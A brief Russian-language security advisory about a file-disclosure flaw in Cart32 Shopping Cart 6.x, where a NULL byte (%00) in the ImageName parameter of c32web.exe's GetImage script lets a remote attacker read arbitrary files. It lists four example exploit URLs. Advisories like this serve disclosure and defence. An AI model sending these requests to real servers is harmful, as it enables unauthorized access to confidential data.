Программа: Cart32 Shopping Cart 6.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в сценарии "ImageName" параметром c32web.exe. Атакующий, используя NULL символы перед расширениями файлов может получить содержимое произвольных файлов на целевой системе.

Пример:

http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png



Оставить мнение